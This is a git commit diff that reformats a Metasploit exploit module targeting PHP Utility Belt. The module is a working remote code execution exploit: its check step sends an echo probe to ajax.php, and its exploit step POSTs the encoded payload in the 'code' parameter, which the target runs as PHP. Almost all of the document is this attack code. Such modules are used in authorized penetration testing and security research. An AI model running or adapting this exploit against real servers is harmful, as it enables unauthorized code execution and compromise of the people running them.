Clean up module

2016-03-09 14:08:26 -06:00 · 2016-03-09 14:08:26 -06:00 · 52d12b68ae
parent 62a611a472
commit 52d12b68ae
1 changed files with 29 additions and 26 deletions
--- a/modules/exploits/multi/http/php_utility_belt_rce.rb
+++ b/modules/exploits/multi/http/php_utility_belt_rce.rb
@ -6,73 +6,76 @@
 require 'msf/core'

 class Metasploit4 < Msf::Exploit::Remote
+
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

-  def initialize(info={})
+  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
-         This module exploits a remote code execution vulnerability in PHP utility Belt
+         This module exploits a remote code execution vulnerability in PHP Utility Belt,
         which is a set of tools for PHP developers and should not be installed in a
-         production environment because this application runs arbitrary PHP code as an
+         production environment, since this application runs arbitrary PHP code as an
         intended functionality.
      },
-      'License'        => MSF_LICENSE,
      'Author'         =>
        [
-          'WICS', # initial discovery
+          'WICS',     # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
-          [ 'EDB', '38901' ],
-          [ 'URL', 'https://github.com/mboynes/php-utility-belt' ] # Official Repo
+          ['EDB', '38901'],
+          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
        ],
+      'DisclosureDate' => 'Aug 12 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Payload'        =>
        {
-          'Space'    => 2000,
-          'DisableNops' => true,
+          'Space'       => 2000,
+          'DisableNops' => true
        },
-      'Platform'       => 'php',
-      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
-          ['PHP Utility Belt', { } ]
+          ['PHP Utility Belt', {}]
        ],
-      'DisclosureDate' => 'Aug 12 2015',
-      'DefaultTarget'  => 0))
+      'DefaultTarget'  => 0
+    ))

    register_options(
      [
-        OptString.new('TARGETURI', [true, 'The path of PHP utility belt', '/php-utility-belt/ajax.php']),
-      ],self.class)
+        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
+      ], self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt};")

-    if res && res.body =~ /#{txt}/
-      return Exploit::CheckCode::Vulnerable
+    if res && res.body.include?(txt)
+      Exploit::CheckCode::Vulnerable
    else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
    end
  end

+  def exploit
+    http_send_command(payload.encoded)
+  end
+
  def http_send_command(cmd)
-    res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path),
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => cmd
      }
-    })
+    )
  end

-  def exploit
-    http_send_command("#{payload.encoded}")
-  end
 end